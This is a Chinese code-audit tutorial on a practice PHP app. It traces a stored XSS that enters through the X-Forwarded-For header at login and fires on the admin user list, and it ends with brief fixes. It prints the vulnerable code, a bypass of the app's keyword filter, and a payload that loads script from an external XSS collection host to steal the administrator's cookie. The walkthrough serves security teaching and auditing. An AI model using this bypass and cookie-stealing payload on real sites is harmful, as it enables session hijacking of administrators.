欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

php代码审计之x-forwarded-for注入漏洞

程序员文章站 2024-03-20 08:36:52
...

前言:

x-forwarded-for大家应该都不陌生,是用来获取客户端的ip地址的,在实际开发应用中也是非常广泛的,今天这篇博客的主要内容就是x-forwarded-for注入xss代码来获得管理员cookie
审计的源码还是上次install.php重装漏洞的源码。

步骤:

1.访问正常用户登录页面如下:php代码审计之x-forwarded-for注入漏洞2.找到源码中对应的文件进行审计,代码如下:

<?php
include_once('../sys/config.php');

if (isset($_POST['submit']) && !empty($_POST['user']) && !empty($_POST['pass'])) {
	$clean_name = clean_input($_POST['user']);
	$clean_pass = clean_input($_POST['pass']);
    $query = "SELECT * FROM users WHERE user_name = '$clean_name' AND user_pass = SHA('$clean_pass')";
    $data = mysql_query($query, $conn) or die('Error!!');

    if (mysql_num_rows($data) == 1) {
        $row = mysql_fetch_array($data);
		$_SESSION['username'] = $row['user_name'];
		$_SESSION['avatar'] = $row['user_avatar'];
		$ip = sqlwaf(get_client_ip());  //活得客戶端ip地址
		$query = "UPDATE users SET login_ip = '$ip' WHERE user_id = '$row[user_id]'";
		mysql_query($query, $conn) or die("updata error!");
        header('Location: user.php');
        }
	else {
		$_SESSION['error_info'] = '用户名或密码错误';
		header('Location: login.php');
	}
	mysql_close($conn);
}
else {
	not_find($_SERVER['PHP_SELF']);
}
?>

3.通过上面的代码知道存在$ip = sqlwaf(get_client_ip());是用来获取客户端的ip地址的,但是进入到了sqlwaf()函数里面,继续跟踪sqlwaf()代码如下:

function sqlwaf( $str ) {
	$str = str_ireplace( "and", "sqlwaf", $str );
	$str = str_ireplace( "or", "sqlwaf", $str );
	$str = str_ireplace( "from", "sqlwaf", $str );
	$str = str_ireplace( "execute", "sqlwaf", $str );
	$str = str_ireplace( "update", "sqlwaf", $str );
	$str = str_ireplace( "count", "sqlwaf", $str );
	$str = str_ireplace( "chr", "sqlwaf", $str );
	$str = str_ireplace( "mid", "sqlwaf", $str );
	$str = str_ireplace( "char", "sqlwaf", $str );
	$str = str_ireplace( "union", "sqlwaf", $str );
	$str = str_ireplace( "select", "sqlwaf", $str );
	$str = str_ireplace( "delete", "sqlwaf", $str );
	$str = str_ireplace( "insert", "sqlwaf", $str );
	$str = str_ireplace( "limit", "sqlwaf", $str );
	$str = str_ireplace( "concat", "sqlwaf", $str );
	$str = str_ireplace( "script", "sqlwaf", $str );
	$str = str_ireplace( "\\", "\\\\", $str );
	$str = str_ireplace( "&&", "sqlwaf", $str ); 
	$str = str_ireplace( "||", "", $str );
	$str = str_ireplace( "'", "", $str ); 
	$str = str_ireplace( "%", "\%", $str );
	$str = str_ireplace( "_", "\_", $str );
	return $str;
}

4.通过过滤的代码其实是可以绕过waf进行注入的,就拿<script>alert(/xss/)</script>为例:输入<s||cript>alert(/xss/)</s||cript>即可绕过sqlwaf()函数(原理是什么大家自己看sqlwaf()的代码)。
既然知道了如何进行绕过了,那我们在登陆前通过burpsuite或者modify Headers(浏览器插件)修改x-forwarded-for为:<sCRiPt/SrC=//xsshs.cn/UOZf>(本人xss平台代码)

burpsuite修改方式:
php代码审计之x-forwarded-for注入漏洞modify Headers修改方式:

php代码审计之x-forwarded-for注入漏洞
5.登录成功了以后,由于是本地搭建和审计的,所以我们打开数据库,看是否将我们构造的xss语句带入到数据库中了,可以看到确实是插入成功了。
php代码审计之x-forwarded-for注入漏洞6.此时更换管理员账号进行登录,继续审计代码找到管理员查看文件代码:

<?php 
include_once('../sys/config.php');

if (isset($_SESSION['admin'])) {
	include_once('../header.php');

	$query = "SELECT * FROM users ORDER BY user_id";
	$data = mysql_query($query, $conn) or die('Error');
	mysql_close($conn);
?>
<table class="items table">
	<thead>
	<tr>
		<th id="yw0_c0">Id</th>
		<th id="yw0_c4">Name</th>
		<th id="yw0_c4">Ip</th>
		<th id="yw0_c4">Manege</th>
	</thead>
	<tbody>
<?php while ($users = mysql_fetch_array($data)) {
	$html_user_name = htmlspecialchars($users['user_name']);
?>
	<tr class="odd">
		<td><?php echo $users['user_id'];?></a></td>
		<td><?php echo $html_user_name;?></td>
		<td><?php echo $users['login_ip'];?></td>
		<td><a href="delUser.php?id=<?php echo $users['user_id'];?>">删除</a></td>
	</tr>
<?php } ?>
</tbody>
</table>

<a href="manage.php">返回</a>
<?php 
require_once('../footer.php');
}
else {
	not_find($_SERVER['PHP_SELF']);
}
 ?>

7.通过上面的代码分析可以看到<?php echo $users['login_ip'];?>直接在数据库中调用了当前变量进行输出,未做任何过滤,通过管理员页面访问。
8.成功触发xss:
php代码审计之x-forwarded-for注入漏洞9.后面就是通过cookie登录后台地址就不演示了,都是很简单的操作

修复:

在sqlwaf()中加入过滤xss的代码,例如html实体化操作等。
管理员页面查看用户信息时,进行严格过滤。